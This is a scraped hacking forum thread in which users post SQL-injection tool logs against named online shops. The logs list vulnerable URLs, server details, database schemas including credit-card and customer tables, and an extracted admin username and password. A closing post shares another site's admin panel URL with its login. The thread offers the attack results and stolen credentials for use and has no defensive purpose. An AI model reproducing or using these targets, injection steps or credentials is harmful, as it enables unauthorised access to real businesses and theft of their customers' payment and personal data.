mail pass, shop ,admin pass

finalescape

BANNED
Messages
8
Reaction score
237
Points
28
Please note, if you want to make a deal with this user, that it is blocked.
Analyzing http://www.quilt-kits-online.com/proddetail.php?prod=IB-OC-HY
Host IP: 216.239.138.103
Web Server: Apache/2
Powered-by: PHP/5.2.14
Keyword Found: Oceanica
Injection type is String (')
Can't find db server type! But maybe there be some chances! [-o<
Selected Column Count is 50
Valid String Column is 2
DB Server: MySQL unknown ver
Target Vulnerable
4.gif

Current DB: quilt011_qkowebstore
Count(table_name) of information_schema.tables Where table_schema=0x7175696C743031315F716B6F77656273746 F7265 is 38
Tables found: address,admin,adminlogin,affiliates,cart,cartoptio ns,countries,coupons,cpnassign,customerlists,custo merlogin,dropshipper,emailmessages,giftcertificate ,giftcertsapplied,installedmods,ipblocking,mailing list,manufacturer,multibuyblock,multisections,opti ongroup,options,orders,orderstatus,payprovider,pos talzones,pricebreaks,prodoptions,products,ratings, recentlyviewed,relatedprods,sections,states,tmplog in,uspsmethods,zonecharges
Count(column_name) of information_schema.columns Where table_schema=0x7175696C743031315F716B6F77656273746 F7265 AND table_name=0x61646D696E is 50
Columns found: adminID,adminVersion,adminUser,adminPassword,admin Email,adminStoreURL,adminProdsPerPage,adminShippin g,adminIntShipping,adminCountry,adminZipCode,admin USPSUser,adminUSPSpw,adminUPSUser,adminUPSpw,admin UPSAccess,FedexAccountNo,FedexMeter,adminCanPostUs er,adminEmailConfirm,adminPacking,adminDelUncomple ted,adminUSZones,adminUnits,adminStockManage,admin Handling,adminTweaks,adminCert,adminUPSLicense,adm inDelCC,adminClearCart,adminlanguages,adminlangset tings,currRate1,currSymbol1,currRate2,currSymbol2, currRate3,currSymbol3,currConvUser,currConvPw,curr LastUpdate,adminSecret,adminHandlingPercent,updLas tCheck,updRecommended,updSecurity,updShouldUpd,adm inUPSAccount,adminUPSNegotiated
Count(column_name) of information_schema.columns Where table_schema=0x7175696C743031315F716B6F77656273746 F7265 AND table_name=0x61646D696E6C6F67696E is 4
Columns found: adminloginid,adminloginname,adminloginpassword,adm inloginpermissions
Count(column_name) of information_schema.columns Where table_schema=0x7175696C743031315F716B6F77656273746 F7265 AND table_name=0x637573746F6D65726C69737473 is 4
Columns found: listID,listName,listOwner,listAccess
Count(column_name) of information_schema.columns Where table_schema=0x7175696C743031315F716B6F77656273746 F7265 AND table_name=0x637573746F6D65726C6F67696E is 8
Columns found: clID,clUserName,clPW,clLoginLevel,clPercentDiscoun t,clActions,clEmail,clDateCreated
Count(column_name) of information_schema.columns Where table_schema=0x7175696C743031315F716B6F77656273746 F7265 AND table_name=0x6F7264657273 is 58
Columns found: ordID,ordSessionID,ordName,ordAddress,ordAddress2, ordCity,ordState,ordZip,ordCountry,ordEmail,ordPho ne,ordShipName,ordShipAddress,ordShipAddress2,ordS hipCity,ordShipState,ordShipZip,ordShipCountry,ord ShipPhone,ordAuthNumber,ordAuthStatus,ordAffiliate ,ordPayProvider,ordTransID,ordShipping,ordStateTax ,ordCountryTax,ordHSTTax,ordHandling,ordShipType,o rdShipCarrier,ordClientID,ordTotal,ordDate,ordIP,o rdDiscount,ordDiscountText,ordExtra1,ordExtra2,ord ShipExtra1,ordShipExtra2,ordCheckoutExtra1,ordChec koutExtra2,ordTrackNum,ordAVS,ordCVV,ordAddInfo,or dCNum,ordComLoc,ordStatus,ordStatusDate,ordStatusI nfo,ordInvoice,ordReferer,ordQuerystr,ordLastName, ordShipLastName,ordLang
Count(column_name) of information_schema.columns Where table_schema=0x7175696C743031315F716B6F77656273746 F7265 AND table_name=0x6F72646572737461747573 is 6
Columns found: statID,statPrivate,statPublic,statPublic2,statPubl ic3,emailstatus
Count(column_name) of information_schema.columns Where table_schema=0x7175696C743031315F716B6F77656273746 F7265 AND table_name=0x70617970726F7669646572 is 22
Columns found: payProvID,payProvName,payProvShow,payProvShow2,pay ProvShow3,payProvEnabled,payProvAvailable,payProvD emo,payProvData1,payProvData2,payProvData3,payProv Order,payProvMethod,payProvLevel,ppHandlingCharge, ppHandlingPercent,pProvHeaders,pProvHeaders2,pProv Headers3,pProvDropShipHeaders,pProvDropShipHeaders 2,pProvDropShipHeaders3

Data Found: adminID=1
Data Found: adminUser=qkoadmin
Data Found: adminPassword=famous01
 
Please note, if you want to make a deal with this user, that it is blocked.
good one finale. havji 1.12 ftw! cya ;D
thanks
here not getting the tables lol wtf.
 
Last edited:
Please note, if you want to make a deal with this user, that it is blocked.
Analyzing http://www.breslov.org/ordering/productdetails.php?productID=33
Host IP: 209.25.170.147
Web Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7e mod_auth_pgsql/2.0.3
Powered-by: PHP/5.2.13
Keyword Found: HTML
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 36
Valid String Column is 6
Target Vulnerable
4.gif

Current DB: breslov_breslov
Count(table_name) of information_schema.tables Where table_schema=0x627265736C6F765F627265736C6F76 is 27
Tables found: Donations,MembershipType,Memberships,associatedPro ducts,category,counter,countries,creditCard,credit CardDetails,customer,dvars,emails,preferences,pric eCode,product,productAttributeItems,productAttribu tes,productAttributesList,shipping,shoppingCart,sh oppingCartAttributeItems,shoppingCartEntry,shoppin gCartLog,states,taxClass,taxRates,test
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x63726564697443617264 is 3
Columns found: creditCardID,name,allowedCard
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x6372656469744361726444657461696C73 is 5
Columns found: creditCardDetailsID,creditCardID,lowerBoundary,upp erBoundary,cardLength
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x637573746F6D6572 is 33
Columns found: customerID,customerNumber,isBusiness,businessName, firstName,lastName,billingAddress1,billingAddress2 ,billingCity,billingState,billingCountry,billingSt ateID,billingCountryID,billingZip,shippingAddress1 ,shippingAddress2,shippingCity,shippingState,shipp ingCountry,shippingStateID,shippingCountryID,shipp ingZip,shippingVia,shippingZone,phone,fax,email,se ndEmailPromos,discountPercent,comments,password,us er,noShipping
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x446F6E6174696F6E73 is 10
Columns found: donorid,creditcardtype,ccname,ccnumber,expyear,expmonth,amount,status,email,date
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x4D656D6265727368697054797065 is 5
Columns found: ID,MembershipName,MembershipPrice,discountpercent, giftdiscount
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x4D656D6265727368697073 is 21
Columns found: ID,membershiptypeid,firstname,lastname,address1,ad dress2,billingcity,billingstateid,billingcountryid ,billingzip,phone,fax,email,creditcardtype,ccnameoncard,creditcardno,ccexpirym onth,ccexpiryyear,datejoined,status,membexp
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x6173736F63696174656450726F6475637473 is 4
Columns found: associatedProductsID,productID,relatedProductID,pr iceCodeID
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x63617465676F7279 is 9
Columns found: categoryID,parentCategoryID,name,description,templ ateURL,imageURL,productCount,hasSubCategories,isSe archable
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x636F756E746572 is 1
Columns found: count
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x636F756E7472696573 is 7
Columns found: countryID,name,ISO2,ISO3,addressFormatID,selected, allowed
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x6476617273 is 5
Columns found: id,category,pdfname,dvar,year
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x656D61696C73 is 4
Columns found: email,pref,approved,id
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x707265666572656E636573 is 4
Columns found: preferenceID,preferenceName,preferenceDescription, preferenceValue
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x7072696365436F6465 is 16
Columns found: priceCodeID,description,type,base,level1Qty,level1 Price,level2Qty,level2Price,level3Qty,level3Price, level4Qty,level4Price,level5Qty,level5Price,level6 Qty,level6Price
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x70726F64756374 is 18
Columns found: productID,categoryID,itemNo,productName,shortDescr iption,longDescription,longDescriptionURL,detailTe mplateURL,mainImageURL,manufacturerName,newFlag,ne wExpiryDate,price,priceCodeID,sale,displayItem,ins tock,av
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x70726F6475637441747472696275746549746 56D73 is 7
Columns found: productAttributeItemID,productAttributeID,itemDesc ription,SKU,priceCodeID,graphicURL,selected
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x70726F6475637441747472696275746573 is 4
Columns found: productAttributeID,name,description,displayType
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x70726F64756374417474726962757465734C6 97374 is 3
Columns found: productAttributesListID,productID,productAttribute ID
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x7368697070696E67 is 6
Columns found: shippingID,countryID,stateID,shippingRate,descript ion,dollarVolume
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x73686F7070696E6743617274 is 23
Columns found: shoppingCartID,shoppingCart,customerID,dateOfSale, subTotal,taxRate1ID,tax1,taxRate2ID,tax2,taxRate3I D,tax3,shippingID,shipping,total,paidBy,creditCard ID,creditCardNo,ccExpiryMonth,ccExpiryYear,ccNameO nCard,status,discountPercent,discountAmount
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x73686F7070696E67436172744174747269627 574654974656D73 is 4
Columns found: shoppingCartAttributeItemsID,productAttributeItemI D,shoppingCartEntryID,price
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x73686F7070696E6743617274456E747279 is 9
Columns found: shoppingCartEntryID,associatedShoppingCartEntryID, shoppingCartID,productID,price,attributePrice,quan tity,extendedPrice,hasSubItems
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x73686F7070696E67436172744C6F67 is 4
Columns found: shoppingCartLogID,shoppingCartID,dateEntered,logEn try
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x737461746573 is 5
Columns found: stateID,abbreviatedName,name,countryID,allowed
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x746178436C617373 is 3
Columns found: taxClassID,name,description
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x7461785261746573 is 9
Columns found: taxRateID,stateID,countryID,taxClassID,taxRate,tax Order,compoundTax,taxOnShippingCharge,description
Count(column_name) of information_schema.columns Where table_schema=0x627265736C6F765F627265736C6F76 AND table_name=0x74657374 is 5
Columns found: 1,2,3,4,5


---------- Сообщение добавлено в 05:31 PM ---------- Предыдущее сообщение размещено в 05:18 PM ----------

http://www.rhodesnow.com/admin/ admin / rodos21
http://www.rhodesnow.com/e-shop/show-products.php?id=62
 
Top